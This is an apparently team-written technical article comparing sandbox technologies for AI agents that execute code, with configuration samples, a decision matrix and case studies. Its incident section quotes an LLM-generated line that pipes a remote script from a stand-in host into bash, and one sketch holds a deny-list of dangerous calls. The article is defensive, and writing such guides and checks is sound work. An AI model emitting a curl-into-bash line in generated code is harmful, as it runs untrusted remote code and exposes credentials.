Sandboxing Code Execution in AI Agents: From Docker to microVMs, a Decision Matrix

A side-by-side comparison of six sandbox technologies, weighing latency, security, and ops cost.

AgentList Team · June 12, 2026
sandbox-execution · microvm · firecracker · ai-agent · code-execution

When an agent needs to execute code that the user just wrote, run a SQL query, launch a browser, or invoke an unknown shell command, "running it on the host" is almost the same as "putting every egg in one basket." This article starts from a real production incident, then breaks down six mainstream sandbox technologies (Docker, E2B, Modal, Firecracker, gVisor, Kata Containers) and offers a copy-pasteable decision matrix.

A production incident: why agents must be sandboxed

In March 2025, one of our code-generation agents received the user prompt: "run pandas on this dataset, then plot the outliers with Plotly." The code from the model looked harmless — import pandas as pd, read a CSV, plotly.express.scatter. But the script also included a line os.system("curl https://x.example.com | bash"), which the LLM justified as "first fetch the data with curl, then process it." After execution, the MinIO credentials inside the container were exfiltrated to an external host.

The post-mortem produced three hard conclusions:

  1. Code-generation agent output is untrusted input. LLM-generated code must be treated like "input from a stranger on the internet."
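  2. Default Docker isolation is not enough. privileged: true hands the container near-complete access to the host's devices and kernel interfaces, and mounting /var/run/docker.sock lets the container drive the Docker daemon, which amounts to immediate host takeover.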
  3. "Isolation" is a layered concept. From "do not mount host directories" to "hardware-virtualized microVM," there are at least four distinct isolation tiers in between.
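As a rough illustration of conclusion 1, the sketch below scans generated code for a few obviously dangerous calls before it is handed to any sandbox. The names find_risky_calls, dotted_name, and RISKY_CALLS are assumptions made for this example, not part of the incident tooling. A static check like this is easy to bypass, so it can only complement real isolation, never replace it.

```python
import ast

# Hypothetical deny-list for illustration; a real policy would be much broader.
RISKY_CALLS = {"os.system", "os.popen", "subprocess.run", "subprocess.Popen", "eval", "exec"}


def dotted_name(node: ast.AST) -> str:
    """Return 'os.system' for an attribute chain, 'eval' for a bare name, '' otherwise."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = dotted_name(node.value)
        return f"{base}.{node.attr}" if base else ""
    return ""


def find_risky_calls(source: str) -> list[tuple[int, str]]:
    """List (line number, call name) for every deny-listed call in the source."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = dotted_name(node.func)
            if name in RISKY_CALLS:
                findings.append((node.lineno, name))
    return sorted(findings)


# The incident script, reduced to its essentials.
generated = (
    "import os\n"
    "import pandas as pd\n"
    'os.system("curl https://x.example.com | bash")\n'
    'df = pd.read_csv("data.csv")\n'
)
print(find_risky_calls(generated))  # [(3, 'os.system')]
```

A finding here is a reason to reject or escalate the script; an empty result is not a reason to trust it.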

This article walks through six sandbox options in order of isolation strength, from weakest to strongest.

L1: Container isolation (Docker / runC) — fastest, but only deters the well-behaved

Containers are the first stop for most agent teams. The code looks like this:

import docker

client = docker.from_env()
# With detach left at its default (False), run() blocks and returns the container's stdout as bytes.
output = client.containers.run(
    "python:3.11-slim",
    command="python -c 'print(2+2)'",
    network_mode="none",       # cut network
    mem_limit="128m",          # memory cap
    pids_limit=64,             # process cap
    read_only=True,            # read-only rootfs
    user="1000:1000",          # non-root
    cap_drop=["ALL"],          # drop all capabilities
    remove=True,               # delete the container once it exits
)
print(output.decode())  # 4

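The problem with containers is not performance (startup is sub-second) but unsafe defaults: unless you explicitly pass cap_drop=["ALL"], the container keeps Docker's default set of kernel capabilities. Even more insidious, without network_mode="none" the container joins the default bridge network with outbound access, so it can reach the internet, other containers on the same bridge, and services listening on the host. That opens the door to data exfiltration and ARP spoofing against neighboring containers. And because every container shares the host kernel, a single kernel exploit is enough to escape.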
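One way to keep these defaults from slipping back in is to audit the keyword arguments before they reach containers.run(). The sketch below is a minimal example of that idea. The helper name audit_run_kwargs and the REQUIRED policy are assumptions for illustration; the keys themselves are the docker-py parameters used in the example above, plus privileged, cap_add, and volumes.

```python
# Settings this sketch expects on every docker-py containers.run(...) call.
REQUIRED = {
    "network_mode": "none",
    "read_only": True,
    "cap_drop": ["ALL"],
}


def audit_run_kwargs(kwargs: dict) -> list[str]:
    """Return human-readable problems found in the kwargs for containers.run()."""
    problems = []
    for key, expected in REQUIRED.items():
        if kwargs.get(key) != expected:
            problems.append(f"{key} should be {expected!r}")
    if kwargs.get("privileged"):
        problems.append("privileged must not be enabled")
    if kwargs.get("cap_add"):
        problems.append("cap_add must be empty")
    user = str(kwargs.get("user", ""))
    if user in ("", "0", "root") or user.startswith(("0:", "root:")):
        problems.append("user must be a non-root UID")
    for limit in ("mem_limit", "pids_limit"):
        if limit not in kwargs:
            problems.append(f"{limit} is missing")
    # Only the dict form of the volumes argument is inspected in this sketch.
    volumes = kwargs.get("volumes") or {}
    if isinstance(volumes, dict) and any("docker.sock" in str(host) for host in volumes):
        problems.append("docker.sock must not be mounted")
    return problems


hardened = {
    "network_mode": "none",
    "mem_limit": "128m",
    "pids_limit": 64,
    "read_only": True,
    "user": "1000:1000",
    "cap_drop": ["ALL"],
}
print(audit_run_kwargs(hardened))              # []
print(audit_run_kwargs({"privileged": True}))  # several problems, including the privileged flag
```

Passing this audit only means the known footguns are absent; the container still shares the host kernel.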

Bottom line: containers are fine for "running my own audited code." They are not fine for LLM-generated code.

L2: Hosted microVMs — what 90% of agent teams should buy

E2B and Modal are the two most widely adopted hosted sandboxes in the agent ecosystem. E2B runs each sandbox in a Firecracker microVM, while Modal's documentation describes gVisor-based isolation rather than a microVM; in both cases the boundary is stronger than a default container. Their shared pitch: you start a sandbox from the SDK, cold start is sub-second, you pay for what you use, and you do not have to operate KVM/QEMU yourself.

E2B: notebook-style Python execution

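from e2b_code_interpreter import Sandbox

# Sub-second cold start; reads E2B_API_KEY from the environment.
# Newer SDK releases may require Sandbox.create() instead of the constructor.
sb = Sandbox()
try:
    execution = sb.run_code("import numpy as np; x = np.arange(10); print(x.sum())")
    print(execution.logs.stdout)  # stdout lines captured inside the sandbox; the sum is 45
    sb.run_code("!curl https://api.ipify.org", on_stdout=lambda l: print(l))
    # prints the sandbox's egress IP, not the host's
finally:
    sb.kill()  # always release the sandbox, even if a call above raises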

E2B is built for long-lived notebook-style execution — the user writes a bit, runs it, inspects output, writes more. The filesystem persists inside the sandbox, and the agent can maintain state across run_code calls.

Modal: sandbox as a serverless function

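import io

import modal

image = modal.Image.debian_slim().pip_install("pandas", "plotly")
app = modal.App("agent-sandbox")

@app.function(image=image, cpu=2, memory=512, timeout=60)
def analyze(csv_bytes: bytes) -> str:
    import pandas as pd  # imported here so it resolves inside the remote image
    # CSV instead of pickle: read_pickle() expects a path or file object, not raw bytes,
    # and unpickling data from an untrusted source can execute arbitrary code.
    df = pd.read_csv(io.BytesIO(csv_bytes))
    return df.describe().to_json()

@app.local_entrypoint()
def main():
    sample = b"a,b\n1,2\n3,4\n"  # illustrative sample data
    print(analyze.remote(sample))  # runs remotely inside Modal's isolated container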

Modal's strength is treating the sandbox as a function. Calling analyze.remote(...) reads like an ordinary Python function call; the only difference is that the body runs remotely inside Modal's isolated container rather than in-process. For the agent, this means "call a tool" and "execute untrusted code" look identical at the API layer.

E2B vs. Modal

  • Choose E2B if your agent is a notebook / REPL experience that needs a long-lived filesystem and dynamic package installation.
  • Choose Modal if your agent is "execute a single function on demand" with serverless elasticity, GPUs, or cron triggers.
  • Choose neither if every byte of user data must stay in your own VPC (finance, healthcare): a vendor-hosted service usually conflicts with such data-residency rules.

L3: Build-your-own microVM — Firecracker, gVisor, Kata Containers

When compliance requires "data must not leave this data center," you have to self-host. Three open-source projects cover this space, with a clean division of labor:

  • Firecracker (open-sourced by AWS): a minimal KVM-based virtual machine monitor that replaces QEMU, with a 125-250ms cold start and under 5MB of memory overhead per microVM. AWS Lambda runs on it.
  • gVisor (open-sourced by Google): intercepts the container's system calls and services them in a user-space kernel, so the workload never talks to the host kernel directly. Cold start is slower than Firecracker (300-500ms), but it reuses Docker images directly.
  • Kata Containers: wraps a microVM around a container, with OCI-standard images outside and KVM/QEMU isolation inside. It has the cleanest Kubernetes integration.

Minimal Firecracker example

# terminal 1: start the Firecracker process (it stays in the foreground and serves the API socket)
firecracker --api-sock /tmp/fc.sock
# terminal 2: configure the kernel, root drive, and machine size, then boot the microVM
curl --unix-socket /tmp/fc.sock -X PUT http://localhost/boot-source \
  -d '{"kernel_image_path":"./vmlinux","boot_args":"console=ttyS0 reboot=k panic=1"}'
curl --unix-socket /tmp/fc.sock -X PUT http://localhost/drives/rootfs \
  -d '{"drive_id":"rootfs","path_on_host":"./rootfs.ext4","is_root_device":true,"is_read_only":false}'
curl --unix-socket /tmp/fc.sock -X PUT http://localhost/machine-config \
  -d '{"vcpu_count":2,"mem_size_mib":512}'
curl --unix-socket /tmp/fc.sock -X PUT http://localhost/actions \
  -d '{"action_type":"InstanceStart"}'

Cold start is 125-250ms. Each microVM boots its own guest kernel and gets its own virtual NIC, so the code inside never shares a kernel with the host and the container-escape attack surface nearly disappears.
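An agent backend would usually drive the same API from code rather than from curl. The sketch below is one way to do that with only the Python standard library, sending the same four PUT requests as the shell example. The names UnixHTTPConnection, boot_requests, and start_microvm are assumptions for illustration, and error handling is reduced to a single status check.

```python
import http.client
import json
import socket


class UnixHTTPConnection(http.client.HTTPConnection):
    """HTTPConnection that talks to a Unix domain socket instead of TCP."""

    def __init__(self, socket_path: str):
        super().__init__("localhost")
        self.socket_path = socket_path

    def connect(self) -> None:
        sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        sock.connect(self.socket_path)
        self.sock = sock


def boot_requests(kernel: str, rootfs: str, vcpus: int = 2, mem_mib: int = 512):
    """Build the (path, body) pairs for the four PUT calls, in boot order."""
    return [
        ("/boot-source", {"kernel_image_path": kernel,
                          "boot_args": "console=ttyS0 reboot=k panic=1"}),
        ("/drives/rootfs", {"drive_id": "rootfs", "path_on_host": rootfs,
                            "is_root_device": True, "is_read_only": False}),
        ("/machine-config", {"vcpu_count": vcpus, "mem_size_mib": mem_mib}),
        ("/actions", {"action_type": "InstanceStart"}),
    ]


def start_microvm(socket_path: str, kernel: str, rootfs: str) -> None:
    """Send the boot sequence; raise if Firecracker rejects any call."""
    for path, body in boot_requests(kernel, rootfs):
        conn = UnixHTTPConnection(socket_path)
        conn.request("PUT", path, body=json.dumps(body),
                     headers={"Content-Type": "application/json"})
        response = conn.getresponse()
        detail = response.read().decode()
        conn.close()
        if response.status >= 300:
            raise RuntimeError(f"PUT {path} failed: {response.status} {detail}")


# Requires a running Firecracker process listening on the socket:
# start_microvm("/tmp/fc.sock", "./vmlinux", "./rootfs.ext4")
```

Keeping the request list separate from the transport makes the boot sequence easy to unit-test without a Firecracker binary.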

Minimal gVisor example

# run Docker on top of gVisor
docker run --runtime=runsc -it python:3.11 bash
# runsc is gVisor's runC replacement

gVisor does not create a microVM. Instead, it redirects the container's syscalls to a user-space "Sentry" process that reimplements the kernel interface. Syscall-heavy work is slower than under Firecracker (the syscall path is 5-10x longer than native), but existing Docker images run unmodified, which keeps ops cost low.

Minimal Kata Containers example

# Kubernetes pod spec
apiVersion: v1
kind: Pod
metadata:
  name: agent-sandbox   # placeholder name; metadata.name is required
spec:
  runtimeClassName: kata-qemu
  containers:
  - name: agent
    image: python:3.11-slim

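kata-qemu is the name of a Kubernetes RuntimeClass whose handler is configured in the node's CRI runtime (containerd or CRI-O). When the kubelet starts a Pod with runtimeClassName: kata-qemu, the CRI runtime hands it to Kata, which boots a microVM around the Pod's containers. No application-side change is needed, which gives Kata the lowest migration cost of the three.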

L4: Decision matrix

Dimension           | Docker          | E2B              | Modal            | Firecracker   | gVisor       | Kata
--------------------+-----------------+------------------+------------------+---------------+--------------+--------------
Cold start          | < 1s            | < 1s             | < 1s             | 125-250ms     | 300-500ms    | 500-800ms
Memory overhead     | ~10MB           | ~50MB            | ~50MB            | < 5MB         | ~30MB        | ~150MB
Isolation strength  | weak            | strong           | strong           | extreme       | strong       | extreme
Network isolation   | config required | default isolated | default isolated | fully virtual | namespace    | fully virtual
Image compatibility | 100%            | custom           | custom           | needs KVM     | 100% Docker  | 100% OCI
Self-ops burden     | low             | zero             | zero             | high          | medium       | medium
Per-instance cost   | $0              | $0.000025/s      | $0.0003/s        | hardware      | hardware     | hardware
Data residency      | self-managed    | offshore         | offshore         | self-managed  | self-managed | self-managed

Decision framework: four steps to pick

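  1. Can the data leave your own infrastructure for a vendor's cloud?
    • Yes → L2 (E2B or Modal): fast and cheap. Use step 2 to choose between them.
    • No → you must self-host; skip to step 3.
  2. Do you need GPU?
    • Yes → Modal: the most mature GPU sandbox.
    • No → E2B or Modal; see the E2B vs. Modal comparison above.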
  3. Do you already have a Kubernetes cluster?
    • Yes → Kata Containers: non-invasive integration through a RuntimeClass.
    • No → continue to step 4.
  4. Do you want to reuse existing Docker images?
    • Yes → gVisor: swap the runtime, that's it.
    • No → Firecracker: the lightest option.
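The funnel is small enough to encode as a function, which makes it easy to unit-test or to embed in a provisioning script. This is a minimal sketch: the function name pick_sandbox and its parameter names are assumptions, and it assumes the GPU question only matters when data may leave your infrastructure, because Modal is a hosted service.

```python
def pick_sandbox(data_can_leave: bool, needs_gpu: bool,
                 has_kubernetes: bool, reuse_docker_images: bool) -> str:
    """Walk the four-step funnel and return the suggested sandbox."""
    # Step 1: data residency decides hosted vs. self-hosted.
    if data_can_leave:
        # Step 2: among hosted options, GPUs point to Modal.
        return "Modal" if needs_gpu else "E2B or Modal"
    # Step 3: an existing Kubernetes cluster favors Kata Containers.
    if has_kubernetes:
        return "Kata Containers"
    # Step 4: reuse Docker images via gVisor, otherwise take the lightest option.
    return "gVisor" if reuse_docker_images else "Firecracker"


print(pick_sandbox(data_can_leave=True, needs_gpu=True,
                   has_kubernetes=False, reuse_docker_images=False))  # Modal
print(pick_sandbox(data_can_leave=False, needs_gpu=False,
                   has_kubernetes=True, reuse_docker_images=True))    # Kata Containers
```

A team that must self-host and also needs GPUs falls outside this funnel and has to evaluate GPU passthrough for the self-hosted options separately.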

Common failure modes

Mistake 1: treating Docker as a "good enough" sandbox. Docker's isolation comes from namespaces and cgroups, not hardware virtualization. A single careless cap_add (SYS_ADMIN, for example) or a privileged flag can give the agent a path to root on the host. LLM-generated code must be treated as untrusted input.

Mistake 2: hosted sandboxes leaking processes. E2B and Modal SDKs do not always kill the sandbox when your code crashes. In production, add a 30-second "idle auto-kill" heartbeat, or your monthly bill will explode.
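A minimal sketch of such an idle auto-kill follows. The class name IdleReaper is an assumption, and the kill callback stands in for whatever the SDK provides (for example a wrapper around the sandbox's kill() method); the clock is injectable so the logic can be tested without waiting.

```python
import time
from typing import Callable, Dict


class IdleReaper:
    """Track the last activity per sandbox and kill the ones that go idle."""

    def __init__(self, kill: Callable[[str], None], idle_seconds: float = 30.0,
                 clock: Callable[[], float] = time.monotonic):
        self._kill = kill
        self._idle_seconds = idle_seconds
        self._clock = clock
        self._last_seen: Dict[str, float] = {}

    def heartbeat(self, sandbox_id: str) -> None:
        """Record activity; call this on every run_code-style request."""
        self._last_seen[sandbox_id] = self._clock()

    def reap(self) -> list[str]:
        """Kill every sandbox idle for at least idle_seconds; return their ids."""
        now = self._clock()
        expired = [sid for sid, seen in self._last_seen.items()
                   if now - seen >= self._idle_seconds]
        for sid in expired:
            self._kill(sid)
            del self._last_seen[sid]
        return expired


# Demo with a fake clock so nothing actually sleeps.
fake_now = [0.0]
killed = []
reaper = IdleReaper(kill=killed.append, clock=lambda: fake_now[0])
reaper.heartbeat("sb-1")
fake_now[0] = 20.0
reaper.heartbeat("sb-2")
fake_now[0] = 35.0
print(reaper.reap())  # ['sb-1']
```

In production, reap() would run on a timer in a process that outlives the agent worker, so a crashed worker cannot take the cleanup down with it.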

Mistake 3: forgetting network policy on self-built microVMs. A microVM isolates CPU, memory, and the kernel, but its virtual NIC is still bridged or routed through the host, so by default nothing stops one microVM from reaching another. You must configure iptables or Cilium to restrict east-west traffic between microVMs.
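For the iptables route, the rules can be generated per microVM. The sketch below assumes each microVM is attached to its own host tap device (tap0, tap1, ...) and that all permitted egress goes through a single proxy; the function name egress_only_rules, the device names, and the proxy address are hypothetical. It covers only forwarded traffic, so traffic addressed to the host itself and reply packets from the proxy still need their own INPUT and conntrack rules.

```python
def egress_only_rules(tap_devices: list[str], proxy_ip: str, proxy_port: int) -> list[str]:
    """Build iptables commands that let each tap device reach only the egress proxy."""
    rules = []
    for tap in tap_devices:
        # Allow TCP from this microVM to the egress proxy.
        rules.append(
            f"iptables -A FORWARD -i {tap} -d {proxy_ip} -p tcp --dport {proxy_port} -j ACCEPT"
        )
        # Drop everything else this microVM tries to forward, including traffic to other taps.
        rules.append(f"iptables -A FORWARD -i {tap} -j DROP")
    return rules


for rule in egress_only_rules(["tap0", "tap1"], "10.0.0.5", 3128):
    print(rule)
```

Order matters: the ACCEPT rule must be appended before the DROP rule for the same device, which the loop guarantees.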

Mistake 4: underestimating gVisor's performance cost. gVisor's syscall interception path is 5-10x longer than native, which noticeably slows I/O-heavy tasks such as ETL. If your agent is data-processing heavy, gVisor is not the first choice.
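Rather than relying on a quoted multiplier, it is worth measuring the overhead for your own workload. The sketch below is a rough micro-benchmark, not a rigorous one: it times repeated os.stat() calls, each of which enters the kernel. Running the same script once in a runc container and once in a runsc container gives a first estimate of the syscall cost. The function name seconds_per_stat is an assumption.

```python
import os
import time


def seconds_per_stat(iterations: int = 100_000) -> float:
    """Average wall-clock cost of one os.stat() call on the current directory."""
    start = time.perf_counter()
    for _ in range(iterations):
        os.stat(os.curdir)
    return (time.perf_counter() - start) / iterations


if __name__ == "__main__":
    print(f"{seconds_per_stat() * 1e6:.2f} microseconds per stat() call")
```

A single syscall type is only a proxy; an ETL job should also be timed end to end under both runtimes before deciding.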

Summary

  • Sandboxes are not optional. LLM-generated code must be treated as untrusted input.
  • Hosted (E2B / Modal) is the right answer for 90% of agent teams; self-built microVMs (Firecracker / gVisor / Kata) are the answer for compliance and data-residency requirements.
  • Pick using the four-step funnel: data residency → GPU → K8s → Docker image compatibility.
  • The sandbox itself is only the isolation layer. Network policy, image signing, process cleanup, and audit logs are the four additional things that must come with it.

A practical next step is to run a 30-minute proof-of-concept on E2B: wrap your agent's current "execute code locally" path inside a Sandbox(), measure the cold-start latency and the token cost impact, and then decide whether to commit to it long-term.

Three real-world case studies

Case 1: a public coding tutor agent. A consumer-facing coding tutor serving 200,000 monthly active students uses E2B as the execution backend. Each student session gets a fresh sandbox; the average session length is 12 minutes, and the agent issues an average of 23 run_code calls per session. Cold start is amortized because the same sandbox is reused within a session. The team's primary concern is cost, not security: every minute of sandbox time costs about $0.0015, so 200,000 sessions a month at 12 minutes each come to roughly $3,600 in sandbox fees (200,000 × 12 × $0.0015). The alternative, running on a self-managed K8s cluster, would have required a dedicated 4-person platform team. The hosted model wins on time-to-market.

Case 2: a fintech data agent with on-prem data. A fintech company built a SQL-plus-Python agent that operates directly on a regulated data lake that cannot leave the corporate VPC. The team evaluated all three self-hosted options and chose Kata Containers because their existing infrastructure already ran Kubernetes. The migration took two engineers six weeks. The main gotcha was disk I/O: Kata's QEMU-based microVM added 8-15% latency to heavy pandas operations compared to native containers, which was acceptable for their use case. They added Cilium network policies on top so microVMs cannot talk to each other, only to the data lake via a pinned egress proxy.

Case 3: a CI tool for AI-generated pull requests. A developer-tooling company reviews AI-generated pull requests by running the proposed code in a sandbox and reporting the test results. They chose Firecracker over E2B because they need start latency low enough to keep the review feedback under 10 seconds end-to-end, and they need full control over the kernel to enforce a custom seccomp profile. The team built a small Rust scheduler that pre-warms a pool of microVMs and hands them out on demand, bringing the p50 time to obtain a ready microVM down to 80ms. Self-hosting Firecracker required 6 person-months upfront but reduced per-execution cost to roughly $0.00003, about 8x cheaper than the hosted alternative at their scale of 80,000 PRs per day.

The three cases share one pattern: the choice is dominated by data residency, latency, and operating cost, not by security features. All three achieve strong isolation because all three run on microVMs. What differs is where the microVMs run, who operates them, and how fast they spin up. A useful checklist for evaluation:

  1. Confirm the sandbox can be killed within 5 seconds when a runaway job is detected.
  2. Confirm network egress is logged to a queryable store.
  3. Confirm the kernel version is pinned and patchable.
  4. Confirm image signing is enforced for any container-to-microVM pipeline.
  5. Confirm the cold-start p99 latency is documented in the SLA.

Each of these is something a hosted service typically provides out of the box, whereas a self-hosted stack has to build it deliberately.
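The pre-warmed pool from Case 3 can be sketched in a few lines. This is not the team's Rust scheduler, only a minimal Python illustration of the idea: boot microVMs ahead of time, hand out a ready one on request, and top the pool back up afterwards. The class name WarmPool and the boot callable are assumptions; in a real system boot would start a microVM and refill would run in a background worker.

```python
import queue
from typing import Callable, Generic, TypeVar

T = TypeVar("T")


class WarmPool(Generic[T]):
    """Keep a fixed number of pre-booted sandboxes ready to hand out."""

    def __init__(self, boot: Callable[[], T], size: int):
        self._boot = boot
        self._size = size
        self._ready: "queue.Queue[T]" = queue.Queue()
        self.refill()

    def acquire(self) -> T:
        """Return a warm sandbox if one is ready, otherwise pay for a cold boot."""
        try:
            return self._ready.get_nowait()
        except queue.Empty:
            return self._boot()

    def refill(self) -> int:
        """Boot replacements until the pool is back at its target size."""
        booted = 0
        while self._ready.qsize() < self._size:
            self._ready.put(self._boot())
            booted += 1
        return booted


# Demo with a fake boot function that just hands out numbered names.
counter = iter(range(1000))
pool = WarmPool(boot=lambda: f"vm-{next(counter)}", size=2)
print(pool.acquire(), pool.acquire(), pool.acquire())  # vm-0 vm-1 vm-2
```

The third acquire() in the demo falls through to a cold boot because the pool is empty, which is the case a well-sized pool is meant to make rare.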